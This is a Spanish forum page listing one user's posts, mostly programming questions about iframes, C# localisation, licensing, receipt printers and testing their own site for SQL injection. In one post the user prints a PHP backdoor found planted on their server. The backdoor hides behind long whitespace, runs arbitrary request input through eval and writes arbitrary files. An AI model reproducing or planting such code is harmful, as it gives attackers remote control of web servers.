elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: [1] 2 3 4
1  Programación / Desarrollo Web / Capturar TARGET de enlaces dentro de IFRAME en: 13 Julio 2013, 06:32 am
Ok, agradezco antes que nada su atención. Tengo 3 iframes en 3 documentos html distintos. Organizados de este modo:

En iframemain.html tengo:

Código:
<iframe src="iframeparent.html" width="100%" height="600">
</iframe>

En iframeparent.html tengo:

Código:
<iframe src="iframeson.html" width="90%" height="350" name="_parent">
</iframe>

En iframeson.html tengo:

Código:
<iframe src="http://anywebsite.com/samplepage.html" width="80%" height="300"></iframe>

Lo hice de este modo porque los enlaces de http://anywebsite.com/samplepage.html se cargan en la ventana principal(iframemain.html), y no es lo que quiero, me gustaría poder capturar el target y cargar el contenido en iframeparent.html, sin que afecte a iframemain.html

Aclaro que no tengo control sobre el contenido de: http://anywebsite.com/samplepage.html, pero es molestoso que sus enlaces carguen en la ventana principal, por eso me gustaría que todos esos enlaces se carguen en el mismo iframe o al mucho en el iframeparent.html

¿Esto es posible con javascript o Jquery?. Gracias por sus respuestas.
2  Programación / .NET (C#, VB.NET, ASP) / Aplicaciones Multi-idioma... (C#.NET or VB.NET) en: 23 Febrero 2013, 16:35 pm
Hola muchachos, tengo en mente la creación de una aplicación sencilla para inventarios. El detalle es que quiero hacerla en 3 idiomas (Inglés, Español y Portugués). Viendo la estructura de algunas otras aplicaciones, veo que esto de los multi-idiomas se puede trabajar similar como se hace en PHP.

Es decir se crean archivitos para cada idioma, donde a una constante se le asigna el texto correspondiente en el idioma. Luego desde la aplicación, en un apartado de <configuración> o similar se puede elegir el idioma.

Alguno de ustedes tiene experiencia o la idea clara de como hacer esto en C#. Puesto que pensé primero crear formularios para cada idioma, pero eso haría muy pesada la aplicación y no es lo que busco. Si pueden darme una idea o recomendarme algún libro (sin importar el idioma) donde pueda obtener ayuda para este tópico estaré muy agradecido.

Saludos  ;)
3  Programación / PHP / ¿Código maliciosos?... Lo encontré en mi SERVER "/ en: 13 Diciembre 2012, 16:15 pm
Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.

Código:
<?php       
                                                                                                                                                                                                                                                                                                                                                                  if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa = $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp']; $fjy_qgk = $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk, $ytyye_fpbqa); }

?>

El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor. 

¿Sus opiniones? :huh:
4  Programación / PHP / Script para Clasificados con Subdominios en: 1 Diciembre 2012, 00:24 am
Hola chicos, tengo una situación nueva para mi

Me pasa que voy a tener que escribir un sitio de clasificados o anuncios online, como MundoAnuncio por ejemplo. La funcionalidad del sitio con eso no hay complicación, el detalles es que quiero crear subdominios por cada pais, por ejemplo

Sitio Principal: http://tusanuncios.com

Sitio Argentina: http://argentina.tusanuncios.com

Sitio Mexico: http://mexico.tusanuncios.com

Quiero darle la posbilidad al usuario de que seleccione su ubicación y en adelante cuando entre al sitio enviarlo al subdomonio correspondiente. por favor ayudenme con esto, no tengo ni idea de como empezar, o que función usar, que necesita el servidor... nada de nada. Necesito puntaladas precisas para escribir ese script.

Muchas gracias por vuestras respuestas.  ;)
5  Programación / PHP / GNU, LPGL, Commons Creative ¿Qué licencia debo usar? en: 14 Mayo 2012, 03:44 am
Hola chicos, tengo escritos algunos scripts o sistemas en php, luego intentaré venderlos en codecanyon, pero he aquí el detalle...

Varios de los componentes como lightbox, calendars, etc eran libres para uso personal entonces los usé, ahora me entero que cada uno de ellos tiene licencia de uso, y que en algunos casos hay que pagar un monto al autor cuando lo quieres usar para proyectos comerciales (algunas "licencias" comerciales cuestan +$800.00 dólares O_O). Entonces he pensado usar los plugin de Jquery, en fin a todo esto...

Estoy buscando nuevos componentes pero no estoy muy enterado de las licencias ¿QUE LICENCIA DEBERÍA TENER EL COMPONENTE QUE ELIJA DE ACUERDO A MIS FINES?...No pretendo vender el código cifrado o algo así por si acaso, lo vendo pero todo mi código en plano, y el código del componente tal como lo baje...

¿Que consejo me dan?. Quiero intentar algo en codecanyon, pero no quiero ganar problemas legales por culpa de licencias, necesito estar seguro de que licencias deberían terner esos componentes para venderlos como UNA PARTE DE MI PRODUCTO.

¿Jquery y Jquery UI puedo usarlos en mi producto comercial?, por ejemplo este:

http://jqueryui.com/demos/datepicker/

Mil Gracias por su atención.
6  Programación / .NET (C#, VB.NET, ASP) / DUDA Imprimir Tickets desde C# IMPRESORA FISCAL en: 9 Mayo 2012, 07:55 am
Hola chicos, tengo mi primer cliente para desarrollo de un punto de venta, todo ok...

He encontrado 2 o 3 clases en c# para imprimir tickets... Ok, no los he probado aún.

La idea del cliente me comenta es que quiere una máquina fiscal o autorizada, para imprimir tickets, boletas, facturas.

Necesito por favor me orienten en esta fase del desarrollo. Tengo dudas puntuales:

- ¿Como mando imprimir los tickets?, encontré esto y no se si sirve para impresoras fiscales:

http://www.foromsn.com/index.php?Ver=Mensaje&Id=178209

http://social.msdn.microsoft.com/Forums/es-ES/repdeves/thread/e9e1556c-4152-4b86-9c0c-bb40fc888318

http://www.portalhacker.net/index.php?topic=108541.0


- Lo que mas me preocupa es que he leído que dicen hay que enviar un comando de corte para que la impresora corte el ticket ¿como se hace esto de los comandos?, ¿donde obtengo la lista de comandos para X impresora o ya viene con su manual?...

Me han dicho también que el corte podría ser manual y esto creo que sería mejor, pero por lo menos necesito asegurarme de que manera debo enviar el texto a la impresora fiscal, por lo menos quiero asegurarme de imprimir el texto.

¿que le digo a mi cliente sobre la impresora, que tipo debería comprar? aún no la tiene, recién la va a comprar y de seguro me pide sugerencia, además creo que sería más cómodo para mi elegir que impresora, así puedo hacer mi código más compatible.
7  Seguridad Informática / Criptografía / ¿Que tipo de cifrado usa esta clave? en: 30 Octubre 2011, 22:20 pm
Hola estoy haciendo una auditoría a un cliente de una aplicación web, resulta que en la tabla de usuarios la contraseña se encuentra en un formato así:

{-23,-71,-125,-20,6... etc, etc}

Necesito saber que tipo de cifrado esta usando, me parece seguro, yo esperaba el clásico MD5 de todos modos necesito saber el tipo de cifrado para ponerlo en el reporte y entregarlo.

No he visto nunca ese cifrado, e intentado buscar cadenas así en google, pero nada, al menos quisiera saber el nombre, gracias por su atención.

Salu2!.
8  Seguridad Informática / Hacking / AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection en: 3 Octubre 2011, 12:23 pm
Hola chicos, les cuento que estoy testeando mi aplicación web contra sqlinjection, tengo una herramienta que automatiza esto pero lo malo es que no consigo las cadenas para hacerlo manualmente y parchar los errores, es decir quiero saber precisamente como ocurre el fallo para corregirlo y no tener problemas con los clientes, ahora bien me he instalado wireshark que me captura todos los paquetes enviados el detalle es que no lo pillo muy bien y hay demasiados paquetes, alguien puede darme una mano o guiarme con esto, digo algun tip, algun filtro para hacer esta tarea menos tediosa o si se tuviera alguna guía sería de mucha ayuda.

Gracias por su atención, salu2.
9  Seguridad Informática / Wireless en Windows / Duda sobre Wireless en: 4 Septiembre 2011, 01:16 am
Hola chicos, tengo unas dudas puntuales, pasa que quiero adquirir internet Wifi de uno de mis vecinos, ahora he visto este equipo:

http://www.mondoplast.ro/eng/External-access-point-TP-Link-TL-WA5210G-pg_ft-4176

Quería preguntarles si un AP puede configurarse como cliente, es decir conectarlo a la red wifi que deseo y luego conectarme al AP físicamente mediante un RJ 45 desde mi pc. ¿Es decir funcionaría conectar un RJ45 directamente desde mi PC al AP?

Además que pasaría si el proveedor wifi utiliza los MikroTik, estos equipos que no usan seguridad WEP WPA sino que piden autenticación en el navegador cuando quieres navegar. ¿Que pasaría en este caso?...

Agradezco desde ya su orientación, trabajaba con adaptadores USB pero para mi portátil son muy molestosos, se desconectan a cada instante, prefiero un cable RJ45 y no me gustaría comprar el equipo para darle ningún uso.

Saludos!  ;)
10  Programación / ASM / AYUDA: Frustrado con ensamblador en: 29 Agosto 2011, 03:50 am
Hola saludos chicos os resumo el tema en cuestión: ESTOY FRUSTRADO CON ASM Y C++...

No sé programar en ASM ni C++, y estoy frustrado porque solía comprar la revista Hakin9, y hasta hace poco la revista @rroba todas las cosas ALUCINANTES llevaban trozos de código en este lenguaje, y seguro direis pero no es difícil busca un tutorial en internet, he leído tutoriales de C++ pero nada de lo que he leído en esos tutos aparece en los códigos que veo en las ezines, salvo algunas variables, estructuras de control, pero hay otras llamadas y textos que no entiendo, en serio, me frustro en ese instante, todo va bien y.... ¡STOOOOOP!.

Me pasa lo mismo con ASM y este si que va peor porque solo he encontrado tutoriales de algunas páginas y me parece que los autores no asumen que uno esta aprendiendo, más parecen repasos para programadores en ASM se dan por entendidas muchas cosas y allí otra vez me frustro.

Lo peor es que como C++ es un lenguaje tanto antiguo al igual que ASM en mi localidad no hay centros de enseñanza para esos lenguajes, enseñan C++ pero variables, flujos, prints, esas cosillas que para ser sincero son básicas. Para esta época más va el .NET, JAVA, AJAX, etc. Soy programador en .NET(VB, C#, y ASP) PHP, AJAX, pero créanme no me gustaría hacerme viejo y quedarme con estas frustraciones, sería de mucha ayuda si me pudieran orientar, les resumo basicamente lo que yo sé:

NET (VB, C#, ASP)
PHP (Web app)
AJAX (Web developer)
Redes: nivel intermedio. (mape, scaneo, paquetes, servidores DHCP, DNS, WEB, brute force, cositas asi.)
Sistema Operativo: Windows el único en todas sus versiones a nivel intermedio, es decir procesos, extensiones, permisos, usuarios, administración básica.

Sé por lógica que algunos de Uds un día comenzaron con ASM ¿alguien puede ayudarme con un manual que pueda yo entender?, o quizás ¿Debería incidir en cierta temática antes de introducirme en ASM?, porque quizás a lo mejor me faltan comprender arquitecturas, memorias, stacks, para enganchar bien con ASM.

Mucho agradeceré vuestra ayuda, siento haber escrito tanto pero en serio, estoy desesperado y no sabía a quien más recurrir.  :-\
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines